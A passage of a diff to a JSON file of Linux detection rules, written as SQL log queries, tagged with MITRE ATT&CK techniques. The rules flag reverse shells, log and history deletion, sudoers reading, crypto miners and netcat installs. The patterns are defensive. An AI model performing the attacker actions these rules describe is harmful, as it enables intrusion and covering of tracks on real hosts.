deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity", "author": "Ömer Günal, oscd.community", "tags": [ - "attack.persistence", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "low", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/at' ESCAPE '\\' OR Image LIKE '%/atd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_at_command.yml" + "filename": "proc_creation_lnx_file_deletion.yml" }, { - "title": "Scheduled Cron Task/Job - Linux", - "id": "6b14bac8-3e3a-4324-8109-42f0546a347f", - "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "title": "Linux Remote System Discovery", + "id": "11063ec2-de63-4153-935e-b1a8b9e616f1", + "description": "Detects the enumeration of other remote systems.", "author": "Alejandro Ortuno, oscd.community", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1053.003" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/arp' ESCAPE '\\' AND CommandLine LIKE '%-a%' ESCAPE '\\') OR (Image LIKE '%/ping' ESCAPE '\\' AND (CommandLine LIKE '% 10.%' ESCAPE '\\' OR CommandLine LIKE '% 192.168.%' ESCAPE '\\' OR CommandLine LIKE '% 172.16.%' ESCAPE '\\' OR CommandLine LIKE '% 172.17.%' ESCAPE '\\' OR CommandLine LIKE '% 172.18.%' ESCAPE '\\' OR CommandLine LIKE '% 172.19.%' ESCAPE '\\' OR CommandLine LIKE '% 172.20.%' ESCAPE '\\' OR CommandLine LIKE '% 172.21.%' ESCAPE '\\' OR CommandLine LIKE '% 172.22.%' ESCAPE '\\' OR CommandLine LIKE '% 172.23.%' ESCAPE '\\' OR CommandLine LIKE '% 172.24.%' ESCAPE '\\' OR CommandLine LIKE '% 172.25.%' ESCAPE '\\' OR CommandLine LIKE '% 172.26.%' ESCAPE '\\' OR CommandLine LIKE '% 172.27.%' ESCAPE '\\' OR CommandLine LIKE '% 172.28.%' ESCAPE '\\' OR CommandLine LIKE '% 172.29.%' ESCAPE '\\' OR CommandLine LIKE '% 172.30.%' ESCAPE '\\' OR CommandLine LIKE '% 172.31.%' ESCAPE '\\' OR CommandLine LIKE '% 127.%' ESCAPE '\\' OR CommandLine LIKE '% 169.254.%' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_schedule_task_job_cron.yml" + "filename": "proc_creation_lnx_remote_system_discovery.yml" }, { - "title": "Linux Base64 Encoded Pipe to Shell", - "id": "ba592c6d-6888-43c3-b8c6-689b8fe47337", - "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell", - "author": "pH-T (Nextron Systems)", + "title": "Decode Base64 Encoded Text", + "id": "e2072cab-8c9a-459b-b63c-40ae79e27031", + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.t1027" ], "falsepositives": [ - "Legitimate administration activities" + "Legitimate activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%base64 -w0 %' ESCAPE '\\' AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/base64' ESCAPE '\\' AND CommandLine LIKE '%-d%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_base64_execution.yml" + "filename": "proc_creation_lnx_base64_decode.yml" }, { - "title": "Disable Or Stop Services", - "id": "de25eeb8-3655-4643-ac3a-b662d3f26b6b", - "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Xterm Reverse Shell", + "id": "4e25af4b-246d-44ea-8563-e42aacab006b", + "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel", + "author": "@d4ns4n_", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' OR Image LIKE '%/systemctl' ESCAPE '\\' OR Image LIKE '%/chkconfig' ESCAPE '\\') AND (CommandLine LIKE '%stop%' ESCAPE '\\' OR CommandLine LIKE '%disable%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%xterm%' ESCAPE '\\' AND CommandLine LIKE '%-display%' ESCAPE '\\' AND CommandLine LIKE '%:1' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_services_stop_and_disable.yml" + "filename": "proc_creation_lnx_xterm_reverse_shell.yml" }, { - "title": "Sudo Privilege Escalation CVE-2019-14287", - "id": "f74107df-b6c6-4e80-bf00-4170b658162b", - "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Package Installed - Linux", + "id": "700fb7e8-2981-401c-8430-be58e189e741", + "description": "Detects installation of suspicious packages using system installation utilities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.t1548.003", - "cve.2019.14287" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Unlikely" + "Legitimate administration activities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE CommandLine LIKE '% -u#%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%install%' ESCAPE '\\') OR (Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%localinstall%' ESCAPE '\\' OR CommandLine LIKE '%install%' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--install%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\'))) AND (CommandLine LIKE '%nmap%' ESCAPE '\\' OR CommandLine LIKE '% nc%' ESCAPE '\\' OR CommandLine LIKE '%netcat%' ESCAPE '\\' OR CommandLine LIKE '%wireshark%' ESCAPE '\\' OR CommandLine LIKE '%tshark%' ESCAPE '\\' OR CommandLine LIKE '%openconnect%' ESCAPE '\\' OR CommandLine LIKE '%proxychains%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml" + "filename": "proc_creation_lnx_install_suspicioua_packages.yml" }, { - "title": "Remove Scheduled Cron Task/Job", - "id": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", - "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Cat Sudoers", + "id": "0f79c4d2-4e1f-4683-9c36-b5469a665e06", + "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.reconnaissance", + "attack.t1592.004" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '% -r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%grep' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '% /etc/sudoers%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_crontab_removal.yml" + "filename": "proc_creation_lnx_cat_sudoers.yml" }, { - "title": "Flush Iptables Ufw Chain", - "id": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", - "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", - "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", + "title": "Curl Usage on Linux", + "id": "ea34fb97-e2c4-4afb-810f-785e4459b194", + "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Network administrators" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/xtables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/iptables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/ip6tables' ESCAPE '\\' OR Image LIKE '%/ip6tables-legacy-multi' ESCAPE '\\') AND (CommandLine LIKE '%-F%' ESCAPE '\\' OR CommandLine LIKE '%-Z%' ESCAPE '\\' OR CommandLine LIKE '%-X%' ESCAPE '\\') AND (CommandLine LIKE '%ufw-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw-logging-allow%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-allow%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE Image LIKE '%/curl' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_iptables_flush_ufw.yml" + "filename": "proc_creation_lnx_curl_usage.yml" }, { - "title": "Apt GTFOBin Abuse - Linux", - "id": "bb382fd5-b454-47ea-a264-1828e4c766d6", - "description": "Detects usage of \"apt\" and \"apt-get\" as a GTFOBin to execute and proxy command and binary execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "System Network Connections Discovery - Linux", + "id": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", + "description": "Detects usage of system utilities to discover system network connections", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.discovery", - "attack.t1083" + "attack.t1049" ], "falsepositives": [ - "Unknown" + "Legitimate activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND CommandLine LIKE '%APT::Update::Pre-Invoke::=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/who' ESCAPE '\\' OR Image LIKE '%/w' ESCAPE '\\' OR Image LIKE '%/last' ESCAPE '\\' OR Image LIKE '%/lsof' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE '%/usr/bin/landscape-sysinfo%' ESCAPE '\\' AND Image LIKE '%/who' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_gtfobin_apt.yml" + "filename": "proc_creation_lnx_system_network_connections_discovery.yml" }, { - "title": "Chmod Suspicious Directory", - "id": "6419afd1-3742-47a5-a7e6-b50386cd15f8", - "description": "Detects chmod targeting files in abnormal directory paths.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "Remove Scheduled Cron Task/Job", + "id": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", + "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1222.002" + "attack.defense_evasion" ], "falsepositives": [ - "Admin changing file permissions." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/chmod' ESCAPE '\\' AND (CommandLine LIKE '%/tmp/%' ESCAPE '\\' OR CommandLine LIKE '%/.Library/%' ESCAPE '\\' OR CommandLine LIKE '%/etc/%' ESCAPE '\\' OR CommandLine LIKE '%/opt/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '% -r%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_susp_chmod_directories.yml" + "filename": "proc_creation_lnx_crontab_removal.yml" }, { - "title": "Local Groups Discovery - Linux", - "id": "676381a6-15ca-4d73-a9c8-6a22e970b90d", - "description": "Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings", - "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "title": "Clear Linux Logs", + "id": "80915f59-9b56-4616-9de0-fd0dea6c12fe", + "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1070.002" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/groups' ESCAPE '\\' OR ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '%/etc/group%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\') AND (CommandLine LIKE '%/var/log%' ESCAPE '\\' OR CommandLine LIKE '%/var/spool/mail%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_local_groups.yml" + "filename": "proc_creation_lnx_clear_logs.yml" }, { "title": "Linux Network Service Scanning", @@ -1514,63 +1589,45 @@ "filename": "proc_creation_lnx_network_service_scanning.yml" }, { - "title": "Setuid and Setgid", - "id": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", - "description": "Detects suspicious change of file privileges with chown and chmod commands", - "author": "Ömer Günal", + "title": "Capabilities Discovery - Linux", + "id": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", + "description": "Detects usage of \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1548.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%chown root%' ESCAPE '\\' AND (CommandLine LIKE '% chmod u+s%' ESCAPE '\\' OR CommandLine LIKE '% chmod g+s%' ESCAPE '\\'))" - ], - "filename": "proc_creation_lnx_setgid_setuid.yml" - }, - { - "title": "User Has Been Deleted Via Userdel", - "id": "08f26069-6f80-474b-8d1f-d971c6fedea0", - "description": "Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks", - "author": "Tuan Le (NCSGroup)", - "tags": [ - "attack.impact", - "attack.t1531" - ], - "falsepositives": [ - "Legitimate administrator activities" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/userdel' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Image LIKE '%/getcap' ESCAPE '\\' AND (CommandLine LIKE '% /r %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_userdel.yml" + "filename": "proc_creation_lnx_capa_discovery.yml" }, { - "title": "BPFtrace Unsafe Option Usage", - "id": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", - "description": "Detects the usage of the unsafe bpftrace option", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Ufw Force Stop Using Ufw-Init", + "id": "84c9e83c-599a-458a-a0cb-0ecce44e807a", + "description": "Detects attempts to force stop the ufw using ufw-init", + "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.execution", - "attack.t1059.004" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of the unsafe option" + "Network administrators" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%bpftrace' ESCAPE '\\' AND CommandLine LIKE '%--unsafe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((CommandLine LIKE '%-ufw-init%' ESCAPE '\\' AND CommandLine LIKE '%force-stop%' ESCAPE '\\') OR (CommandLine LIKE '%ufw%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml" + "filename": "proc_creation_lnx_disable_ufw.yml" }, { - "title": "Vim GTFOBin Abuse - Linux", - "id": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", - "description": "Detects usage of \"vim\" and it's siblings as a GTFOBin to execute and proxy command and binary execution", + "title": "Potential Discovery Activity Using Find - Linux", + "id": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", + "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", @@ -1579,468 +1636,465 @@ "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/vim' ESCAPE '\\' OR Image LIKE '%/rvim' ESCAPE '\\' OR Image LIKE '%/vimdiff' ESCAPE '\\') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% --cmd%' ESCAPE '\\') AND (CommandLine LIKE '%:!/%' ESCAPE '\\' OR CommandLine LIKE '%:py %' ESCAPE '\\' OR CommandLine LIKE '%:lua %' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/find' ESCAPE '\\' AND (CommandLine LIKE '%-perm -4000%' ESCAPE '\\' OR CommandLine LIKE '%-perm -2000%' ESCAPE '\\' OR CommandLine LIKE '%-perm 0777%' ESCAPE '\\' OR CommandLine LIKE '%-perm -222%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o w%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o x%' ESCAPE '\\' OR CommandLine LIKE '%-perm -u=s%' ESCAPE '\\' OR CommandLine LIKE '%-perm -g=s%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_gtfobin_vim.yml" + "filename": "proc_creation_lnx_susp_find_execution.yml" }, { - "title": "Connection Proxy", - "id": "72f4ab3f-787d-495d-a55d-68c2ff46cf4c", - "description": "Detects setting proxy configuration", - "author": "Ömer Günal", + "title": "Linux Doas Tool Execution", + "id": "067d8238-7127-451c-a9ec-fa78045b618b", + "description": "Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.", + "author": "Sittikorn S, Teoderick Contreras", "tags": [ - "attack.defense_evasion", - "attack.t1090" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Legitimate administration activities" + "Unlikely" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%http\\_proxy=%' ESCAPE '\\' OR CommandLine LIKE '%https\\_proxy=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE Image LIKE '%/doas' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_proxy_connection.yml" + "filename": "proc_creation_lnx_doas_execution.yml" }, { - "title": "Group Has Been Deleted Via Groupdel", - "id": "8a46f16c-8c4c-82d1-b121-0fdd3ba70a84", - "description": "Detects execution of the \"groupdel\" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks", - "author": "Tuan Le (NCSGroup)", + "title": "Potential Perl Reverse Shell Execution", + "id": "259df6bc-003f-4306-9f54-4ff1a08fa38e", + "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity", + "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1531" + "attack.execution" ], "falsepositives": [ - "Legitimate administrator activities" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/groupdel' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/perl' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\') AND ((CommandLine LIKE '%fdopen(%' ESCAPE '\\' AND CommandLine LIKE '%::Socket::INET%' ESCAPE '\\') OR (CommandLine LIKE '%Socket%' ESCAPE '\\' AND CommandLine LIKE '%connect%' ESCAPE '\\' AND CommandLine LIKE '%open%' ESCAPE '\\' AND CommandLine LIKE '%exec%' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_groupdel.yml" + "filename": "proc_creation_lnx_perl_reverse_shell.yml" }, { - "title": "DD File Overwrite", - "id": "2953194b-e33c-4859-b9e8-05948c167447", - "description": "Detects potential overwriting and deletion of a file using DD.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "tags": [ - "attack.impact", - "attack.t1485" - ], + "title": "Linux Crypto Mining Indicators", + "id": "9069ea3c-b213-4c52-be13-86506a227ab1", + "description": "Detects command line parameters or strings often used by crypto miners", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Any user deleting files that way." + "Legitimate use of crypto miners" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image IN ('/bin/dd', '/usr/bin/dd') AND CommandLine LIKE '%of=%' ESCAPE '\\' AND (CommandLine LIKE '%if=/dev/zero%' ESCAPE '\\' OR CommandLine LIKE '%if=/dev/null%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%sh -c /sbin/modprobe msr allow\\_writes=on%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_dd_file_overwrite.yml" + "filename": "proc_creation_lnx_crypto_mining.yml" }, { - "title": "Linux HackTool Execution", - "id": "a015e032-146d-4717-8944-7a1884122111", - "description": "Detects known hacktool execution based on image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Python Reverse Shell", + "id": "32e62bc7-3de0-4bb1-90af-532978fe42c0", + "description": "Detects executing python with keywords related to network activity that could indicate a potential reverse shell", + "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/sqlmap' ESCAPE '\\' OR Image LIKE '%/teamserver' ESCAPE '\\' OR Image LIKE '%/aircrack-ng' ESCAPE '\\' OR Image LIKE '%/john' ESCAPE '\\' OR Image LIKE '%/setoolkit' ESCAPE '\\' OR Image LIKE '%/wpscan' ESCAPE '\\' OR Image LIKE '%/hydra' ESCAPE '\\' OR Image LIKE '%/nikto' ESCAPE '\\' OR Image LIKE '%/ebpfkit' ESCAPE '\\' OR Image LIKE '%/bpfdos' ESCAPE '\\' OR Image LIKE '%/exechijack' ESCAPE '\\' OR Image LIKE '%/pidhide' ESCAPE '\\' OR Image LIKE '%/writeblocker' ESCAPE '\\') OR Image LIKE '%/linpeas%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%python%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%import%' ESCAPE '\\' AND CommandLine LIKE '%pty%' ESCAPE '\\' AND CommandLine LIKE '%spawn(%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_hack_tools.yml" + "filename": "proc_creation_lnx_python_reverse_shell.yml" }, { - "title": "Clear Linux Logs", - "id": "80915f59-9b56-4616-9de0-fd0dea6c12fe", - "description": "Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion", - "author": "Ömer Günal, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1070.002" - ], + "title": "Nohup Execution", + "id": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2", + "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "falsepositives": [ - "Legitimate administration activities" + "Administrators or installed processes that leverage nohup" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\') AND (CommandLine LIKE '%/var/log%' ESCAPE '\\' OR CommandLine LIKE '%/var/spool/mail%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE Image LIKE '%/nohup' ESCAPE '\\'" ], - "filename": "proc_creation_lnx_clear_logs.yml" + "filename": "proc_creation_lnx_nohup.yml" }, { - "title": "Install Root Certificate", - "id": "78a80655-a51e-4669-bc6b-e9d206a462ee", - "description": "Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s", - "author": "Ömer Günal, oscd.community", + "title": "History File Deletion", + "id": "1182f3b3-e716-4efa-99ab-d2685d04360f", + "description": "Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.impact", + "attack.t1565.001" ], "falsepositives": [ "Legitimate administration activities" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/update-ca-certificates' ESCAPE '\\' OR Image LIKE '%/update-ca-trust' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\') AND ((CommandLine LIKE '%/.bash\\_history%' ESCAPE '\\' OR CommandLine LIKE '%/.zsh\\_history%' ESCAPE '\\') OR (CommandLine LIKE '%\\_history' ESCAPE '\\' OR CommandLine LIKE '%.history' ESCAPE '\\' OR CommandLine LIKE '%zhistory' ESCAPE '\\')))" ], - "filename": "proc_creation_lnx_install_root_certificate.yml" + "filename": "proc_creation_lnx_susp_history_delete.yml" }, { - "title": "Suspicious Git Clone - Linux", - "id": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", - "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Setuid and Setgid", + "id": "c21c4eaa-ba2e-419a-92b2-8371703cbe21", + "description": "Detects suspicious change of file privileges with chown and chmod commands", + "author": "Ömer Günal", "tags": [ - "attack.reconnaissance", - "attack.t1593.003" + "attack.persistence", + "attack.t1548.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/git' ESCAPE '\\' AND CommandLine LIKE '% clone %' ESCAPE '\\' AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RCE%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE 